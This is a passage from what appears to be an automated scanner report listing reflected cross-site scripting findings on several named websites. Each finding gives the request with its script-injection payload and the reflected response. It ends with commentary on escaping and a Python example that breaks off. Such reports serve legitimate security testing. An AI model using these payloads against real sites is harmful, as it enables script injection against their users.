This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ace45<script>alert(1)</script>83d451f698a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:32:52 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40787
Content-Type: text/html
Expires: Mon, 02 May 2011 11:31:52 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=MBIHKEODKLODDOOAKIGOMOBG; path=/
Cache-control: False


<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<font color="red">http://www.tradearca.com/favicon.ico?ace45<script>alert(1)</script>83d451f698a=1</font>
...[SNIP]...

6.102. http://www.travelagentcentral.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelagentcentral.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c96af"><script>alert(1)</script>e9980385dab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc96af"><script>alert(1)</script>e9980385dab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSb5663581135df8f6d7f3994b7ed7a15c=u8or7c4bpue562t1bohhqhksi0; expires=Thu, 26-May-2011 13:52:59 GMT; path=/; domain=.travelagentcentral.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:19:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
   
...[SNIP]...
<a rel="nofollow" onclick="                        window.open('http://www.travelagentcentral.com/favicon.icoc96af"><script>alert(1)</script>e9980385dab?print=1' ,'' ,'');" href="javascript:void(0)" class="print" rel="nofollow">
...[SNIP]...

6.103. http://www.travelagentcentral.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelagentcentral.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ef0"><script>alert(1)</script>004bb9d1fb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?a0ef0"><script>alert(1)</script>004bb9d1fb8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:19:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSb5663581135df8f6d7f3994b7ed7a15c=0cplvbem6chaa1b42njbn3js30; expires=Thu, 26-May-2011 13:52:42 GMT; path=/; domain=.travelagentcentral.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:19:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
   
...[SNIP]...
<a rel="nofollow" onclick="                        window.open('http://www.travelagentcentral.com/favicon.ico?a0ef0"><script>alert(1)</script>004bb9d1fb8=1&print=1' ,'' ,'');" href="javascript:void(0)" class="print" rel="nofollow">
...[SNIP]...

6.104. http://www.upmystreet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.upmystreet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 154da'%3balert(1)//fc891691e7e was submitted in the REST URL parameter 1. This input was echoed as 154da';alert(1)//fc891691e7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico154da'%3balert(1)//fc891691e7e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upmystreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 03 May 2011 11:22:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Set-Cookie: umsLocId=uk; expires=Thu, 02-Jun-2011 11:22:45 GMT; path=/; domain=upmystreet.com
Set-Cookie: umsLocId=uk; expires=Thu, 02-Jun-2011 11:22:45 GMT; path=/; domain=upmystreet.com
Set-Cookie: PHPSESSID=q70dpe7839j7k219mprla3aid2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uswitch=1795230218.16415.0000; path=/
Vary: Accept-Encoding
Content-Length: 45783

b2ca
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<!--[CDATA[
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName = 'www.upmystreet.com/favicon.ico154da';alert(1)//fc891691e7e';
s.server="";
s.channel = '';
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5 = '';
s.prop6 = '';
s.prop21 = 'PR4 3HP';
s
...[SNIP]...

6.105. http://www.vermontjoblink.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vermontjoblink.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e14f"><a>32f0ca47cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. In the response the reflection point is the content attribute of a <meta http-equiv="refresh"> element inside <head>, and the "> sequence is echoed unmodified, so the attribute itself can be closed; whatever blocked the script payload lies elsewhere. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?1e14f"><a>32f0ca47cab=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vermontjoblink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:59:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4238884;expires=Thu, 25-Apr-2041 10:59:18 GMT;path=/
Set-Cookie: CFTOKEN=a337ccc50de11539-B58317FC-9B89-7B08-004A1FC31CD1B138;expires=Thu, 25-Apr-2041 10:59:18 GMT;path=/
Set-Cookie: CFID=4238884;path=/
Set-Cookie: CFTOKEN=a337ccc50de11539%2DB58317FC%2D9B89%2D7B08%2D004A1FC31CD1B138;path=/
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub -->
               <html lang="en">
               <head>
               <meta http-equiv="refresh" content="0;URL=https://www.vermontjoblink.com/ada/404/404_qry.cfm?404;http://www.vermontjoblink.com:80/favicon.ico?1e14f"><a>32f0ca47cab=1" />
...[SNIP]...

6.106. http://www.vivareal.us/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vivareal.us
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fa51<script>alert(1)</script>b3226e6c249 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico8fa51<script>alert(1)</script>b3226e6c249 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vivareal.us
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Expires: Tue, 03 May 2011 10:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:47:30 GMT
Content-Length: 11182
Connection: close
Set-Cookie: JSESSIONID=E330D07AEE51FEE4827CA811EE3958D7; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<span>/favicon.ico8fa51<script>alert(1)</script>b3226e6c249/</span>
...[SNIP]...

6.107. http://www.wdasfm.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wdasfm.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb2ad"><script>alert(1)</script>867d071c772 was submitted in the REST URL parameter 1. This input was echoed as fb2ad\"><script>alert(1)</script>867d071c772 in the application's response. The inserted backslash is consistent with addslashes()/magic_quotes-style escaping; a backslash has no meaning inside an HTML attribute, so the double quote still terminates the attribute value and the tags that follow are parsed normally.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofb2ad"><script>alert(1)</script>867d071c772 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4191481514
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:31:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:31:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - 105.3 WDAS-FM Philly's Best R&B and Classic Soul!
...[SNIP]...
<meta property="og:url" content="http://www.wdasfm.com/favicon.icofb2ad\"><script>alert(1)</script>867d071c772" />
...[SNIP]...

6.108. http://www.wdasfm.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wdasfm.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f7e"><script>alert(1)</script>b888178402f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8f7e\"><script>alert(1)</script>b888178402f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b8f7e"><script>alert(1)</script>b888178402f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4191442722
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:29:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:29:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - 105.3 WDAS-FM Philly's Best R&B and Classic Soul!
...[SNIP]...
<meta property="og:url" content="http://www.wdasfm.com/favicon.ico?b8f7e\"><script>alert(1)</script>b888178402f=1" />
...[SNIP]...

6.109. http://www.web-stat.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.web-stat.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1067f'-alert(1)-'b7f7d77d581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico1067f'-alert(1)-'b7f7d77d581 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.web-stat.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:37:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: referrer_id=; expires=Wed 02-May-2012 11:37:43 GMT; path=/
Set-Cookie: referred_by_affiliate=; domain=.web-stat.net; expires=Tue 03-May-2011 11:38:43 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI", policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Length: 11210


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<t
...[SNIP]...
<script type="text/javascript">

// BEGIN PARAMETERS
var page_name = 'favicon.ico1067f'-alert(1)-'b7f7d77d581';
var invisible = 'yes';
var text_counter = '#';
// END PARAMETERS

wtslog('al2474','1','http',page_name,invisible,text_counter);
</script>
...[SNIP]...

6.110. http://www.webdesign.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webdesign.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc655'%3balert(1)//8b15d10d7c was submitted in the REST URL parameter 1. This input was echoed as bc655';alert(1)//8b15d10d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icobc655'%3balert(1)//8b15d10d7c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webdesign.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=f3e5ad0dac14543eec27dfe2ee6d1572; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=f3e5ad0dac14543eec27dfe2ee6d1572; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 2288
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Website Templates for web design (Dreamweaver, Frontpage, Flash)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="
...[SNIP]...
<script type="text/javascript">
try {
_gaq.push(['_setAccount', 'UA-2347512-1']);
_gaq.push(['_trackPageview']);
_gaq.push(['_trackEvent', 'SiteError', '404', '/favicon.icobc655';alert(1)//8b15d10d7c']);
} catch(err) {}
</script>
...[SNIP]...

6.111. http://www.webdesign.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webdesign.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4be24<script>alert(1)</script>e4bac863956 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4be24<script>alert(1)</script>e4bac863956 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webdesign.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:31:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=520abccfb55413c7b0597f912043928e; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=520abccfb55413c7b0597f912043928e; expires=Tue, 03-May-2011 12:31:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 2316
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Website Templates for web design (Dreamweaver, Frontpage, Flash)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="
...[SNIP]...
<strong>/favicon.ico4be24<script>alert(1)</script>e4bac863956</strong>
...[SNIP]...

6.112. http://www.wireless-driver.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wireless-driver.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b5de'><script>alert(1)</script>fc86971b1f4 was submitted in the REST URL parameter 1. This input was echoed as 4b5de\'><script>alert(1)</script>fc86971b1f4 in the application's response. As with the double-quoted cases, the backslash is consistent with addslashes()/magic_quotes-style escaping and does not protect an HTML attribute: the single quote still closes the href value.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4b5de'><script>alert(1)</script>fc86971b1f4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wireless-driver.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 03 May 2011 10:32:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Vary: Cookie
X-Pingback: http://www.wireless-driver.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:32:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 28264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<area shape='rect' coords='0,0,16,11' href='http://www.wireless-driver.com/favicon.ico4b5de\'><script>alert(1)</script>fc86971b1f4' id='flag_en' title='English'/>
...[SNIP]...

6.113. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db980<script>alert(1)</script>03baad4d242 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodb980<script>alert(1)</script>03baad4d242 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38718

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<td width="90%" height="29" class="maintitletext">Favicon.icodb980<script>alert(1)</script>03baad4d242's Profile </td>
...[SNIP]...

6.114. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3234f'><script>alert(1)</script>783c7457092 was submitted in the REST URL parameter 1. This input was echoed as 3234f\'><script>alert(1)</script>783c7457092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3234f'><script>alert(1)</script>783c7457092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38748

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<input name='user' type='hidden' value='Favicon.ico3234f\'><script>alert(1)</script>783c7457092' />
...[SNIP]...

6.115. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96af4"><script>alert(1)</script>9b2bc11874d was submitted in the REST URL parameter 1. This input was echoed as 96af4\"><script>alert(1)</script>9b2bc11874d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico96af4"><script>alert(1)</script>9b2bc11874d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38748

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<form name="jumpcategory" method="post" action="http://www.xcomment.com/Favicon.ico96af4\"><script>alert(1)</script>9b2bc11874d&pg=1">
...[SNIP]...

6.116. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xcomment.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload abab7</title><script>alert(1)</script>1f94ac6ba59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoabab7</title><script>alert(1)</script>1f94ac6ba59 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38798

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<title>Favicon.icoabab7</title><script>alert(1)</script>1f94ac6ba59's MySpace Graphics and Pictures for MySpace Comments</title>
...[SNIP]...

6.117. http://www.boomboomflicks.com/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boomboomflicks.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6df75'-alert(1)-'66875c09aad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the reflected data arrives in the Referer request header, this is not trivial to exploit against another user: script on an attacker's page cannot set that header directly. The Referer is attacker-influenced all the same. When a victim follows a link from a page the attacker hosts, the browser sends that page's URL as the Referer, and the referring page chooses its own Referrer-Policy: with unsafe-url (or no-referrer-when-downgrade on a same-scheme link) the full URL, injected query string included, reaches the target. The Flash-based header-injection techniques mentioned in older scanner output no longer apply in current browsers. This limitation therefore only partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
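
Findings 6.104, 6.109, 6.110 and 6.117 all place the reflected value inside a single-quoted JavaScript string literal, where a single quote ends the literal and whatever follows is parsed as code. The Python script below is an added example, not code from this report or from any of the applications listed. It assumes a template like the one in 6.109 (var page_name = '...';) and, with a small JavaScript string-literal scanner standing in for the browser's tokenizer, shows what ends up outside the literal for that naive template versus a JSON-based encoder that additionally escapes < > & as \uXXXX. It goes one step beyond the probes on this page by also covering a payload that closes the enclosing <script> element, which quote escaping alone does not stop. The template, function names and scanner are illustrative assumptions.

```python
import json

# Probe strings copied from findings 6.104, 6.109 and 6.117 (scanner payloads, not exploit code).
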